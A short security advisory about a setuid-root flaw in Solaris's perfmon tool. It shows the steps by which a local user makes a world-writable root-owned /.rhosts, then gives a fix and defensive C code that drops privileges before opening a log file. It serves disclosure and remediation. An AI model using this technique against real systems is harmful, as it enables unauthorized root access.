Vulnerability

    /opt/JSParm/bin/perfmon

Affected

    Solaris 2.X

Description

    Kim Yong Jun [Hackerslab bug_paper] found the following. parm is a program that displays system information. parm is a SunOS application. It is not included in the Solaris basic package. There is a vulnerability in the perfmon program that lets you create any file with root privilege, as follows:

        $ whoami
        loveyou
        $ umask 0000
        $ /opt/JSparm/bin/perfmon &

    Choose Logging -> Logging File. In the Selection part, input the file path you want to create, e.g. /.rhosts. The following file is created in a second:

        -rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost

Solution

    Remove the setuid permission, contact your vendor and get a patch.
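The listing above shows a root-owned file created with the caller's umask, which is the result of a setuid-root program opening a user-supplied path under its effective uid. The following is an added example, not perfmon's code or the vendor patch, of how a setuid program can open such a log file with the invoking user's identity; the helper name open_log_as_invoker and the default file name are hypothetical.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: open a user-chosen log path with the invoking user's
 * identity instead of the setuid owner's. Returns a descriptor, or -1. */
int open_log_as_invoker(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd = -1, err = EPERM;

    /* Drop the group first: once euid is unprivileged, setegid() may fail. */
    if (setegid(getgid()) == 0 && seteuid(getuid()) == 0) {
        /* Permission checks now run against the real user, so an
         * unprivileged caller cannot create /.rhosts. O_EXCL never reuses
         * an existing file, O_NOFOLLOW rejects a symlink as the last
         * component, and mode 0600 holds under any umask because umask
         * can only clear bits. */
        fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
        err = errno;
    }

    /* Restore in reverse order; fail closed if that is not possible. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0) {
        if (fd >= 0)
            close(fd);
        return -1;
    }
    errno = err;
    return fd;
}

int main(int argc, char **argv)
{
    int fd = open_log_as_invoker(argc > 1 ? argv[1] : "perfmon-demo.log");
    if (fd < 0) { perror("open_log_as_invoker"); return 1; }
    printf("log opened as uid %ld\n", (long)getuid());
    return close(fd) != 0;
}
```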